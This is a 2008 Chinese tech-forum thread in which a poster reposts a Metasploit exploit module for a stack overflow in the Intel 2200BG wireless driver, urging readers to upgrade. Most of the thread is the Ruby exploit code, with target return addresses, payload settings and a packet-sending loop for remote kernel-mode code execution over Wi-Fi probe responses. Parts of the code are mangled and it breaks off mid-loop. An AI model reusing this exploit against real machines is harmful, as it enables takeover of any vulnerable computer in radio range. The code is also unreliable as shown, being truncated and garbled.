文本版|topic 高级搜索
   名人堂 帮助 论坛制度 意见反馈 | 首页 博客 周新贴 招聘 专题 新闻
RSS 底部
 
社区导航: 专家门诊   网络技术   操作系统   数据库   程序设计   系统应用   考试认证   CIO及信息化   站长交流   综合交流   下载基地  51CTO产品服务 设为首页 | 收藏本站
51CTO技术论坛» 网络安全 » 远程无线攻克你的系统--Intel无线网卡的漏洞       [ 打印]  [ 订阅]  [ 收藏]  [ 推荐给朋友]   [ 本帖文本页]

论坛跳转:
     
标题: [转载] 远程无线攻克你的系统--Intel无线网卡的漏洞  ( 查看:152  回复:3 )   
 
SimpleLove
副版主  点击可查看详细


帖子 1918
精华 7
无忧币 7043
积分 5710
阅读权限 140
注册日期 2006-1-11
最后登录 2008-7-4 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-4-22 08:29   标题:远程无线攻克你的系统--Intel无线网卡的漏洞
上一帖 |
Intel - PRO/Wireless 2200BG Network Connection,估计很多机器都是这个型号的无线网卡,赶紧升级吧..
http://www.milw0rm.com/exploits/5461

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Exploits::Windows::Driver::Intel_Centrino_2200BG_driver_probe  'Intel Centrino 2200BG Wireless Driver Probe Overflow',
'Description' => %q{
This module exploits a stack overflow in the w22n51.sys driver provided
with the Intel 2200BG integrated wireless adapter. This stack overflow
allows remote code execution in kernel mode. The stack overflow is triggered
when a 802.11 Probe response frame is received that contains multi vendor specific tag
and "\x00" as essid and essid length element. This exploit was tested with version 8.0.12.20000
of the driver and an Intel Centrino 2200BG integrated wireless adapter. Newer
versions of the w22n51.sys driver are provided from Intel to resolve this flaw.
Since this vulnerability is exploited via probe response frames, all cards within
range of the attack will be affected.

Vulnerable clients don't need to have their card in a particular state for this exploit
to work.

This module depends on the Lorcon library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon documentation
(external/ruby-lorcon/README) for more information.
},

'Author' =>
[
'oveRet \'Giuseppe Gottardi\'  MSF_LICENSE,
'Version' => '$Revision: 4529 $',
'References' =>
[
['URL', 'http://www.kb.cert.org/vuls/id/524332'],
['URL', 'http://www.milw0rm.org/exploits/3158'],
['URL', 'http://overet.securitydate.it/stuff/2200BG_8.0.12.20000_drivers.zip']
],
'Privileged' => true,

'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},

'Payload' =>
{
'Space' => 224
},
'Platform' => 'win',
'Targets' =>
[
# Windows XP SP2
# 5.1.2600 (xpsp_sp2_gdr.070227-2254)
[ 'Windows XP SP2 (5.1.2600), w22n51.sys 8.0.12.20000',
{
'Ret' => 0x8054eb62,
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook', # don't change this
'PrependUser' => "\xeb\x02" + # required jump
"\x85\xe0", # fixed max len
'Recovery' => 'idlethread_restart',
'KiIdleLoopAddress' => 0x804dbb27,
}
}
}
]
],

'DefaultTarget' => 0
))

register_options(
[
OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
OptInt.new('RUNTIME', [ true, "The number of time to run the attack", 1000]),
OptInt.new('DELAY', [ true, "The number of seconds to sleep between the packets", 1]),
], self.class)
end

def exploit
open_wifi

rtime = datastore['RUNTIME'].to_i
dtime = datastore['DELAY'].to_i
count = 0

print_status("Sending probe exploit to #{datastore['ADDR_DST']}...")
print "[-] "

while (count




好好学习,天天向上
2008-4-22 08:291楼
[ 顶部 ]
 
alexclover
技术员  点击可查看详细



帖子 259
精华 0
无忧币 167
积分 260
阅读权限 30
注册日期 2008-1-14
最后登录 2008-6-30 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-4-22 09:39 
什么意思哦
不解释 下阿



网络工程师到底该不该去考CCIE认证?
2008-4-22 09:392楼
[ 顶部 ]
 
csllff
新新人类  点击可查看详细



十二生肖之狗   水瓶座   行业勋章   技术勋章   诚信兄弟  
帖子 163
精华 0
无忧币 146
积分 170
阅读权限 20
注册日期 2006-7-8
最后登录 2008-5-27 离线

[查看资料]  [发短消息]  [Blog
       
发表于:2008-4-22 10:22 
什么意思哦
不解释 下阿



网络工程师到底该不该去考CCIE认证?
2008-4-22 10:223楼
[ 顶部 ]
 
queniao
副版主  点击可查看详细



十二生肖之虎   天秤座   行业勋章   技术勋章   诚信兄弟  
帖子 599
精华 2
无忧币 2485
积分 1022
阅读权限 140
注册日期 2006-4-2
最后登录 2008-7-4 离线

[查看资料]  [发短消息]  [Blog
[个人主页]    QQ       
发表于:2008-4-22 10:42 
Ruby Lorcon  Code ,驱动  有栈溢出漏洞



网络工程师到底该不该去考CCIE认证?
2008-4-22 10:424楼
[ 顶部 ]
     
论坛跳转:  

| | |

| | |

| | |

标记已读 · 删除论坛Cookies · 文本版 · WAP
 
| 诚征版主 | 版主堂 | 意见建议 | 大史记 | 论坛地图
Copyright©2005-2008 51CTO.COM  Powered by Discuz!
本论坛言论纯属发布者个人意见,不代表51CTO网站立场!如有疑义,请与管理员联系。
京ICP备05051492号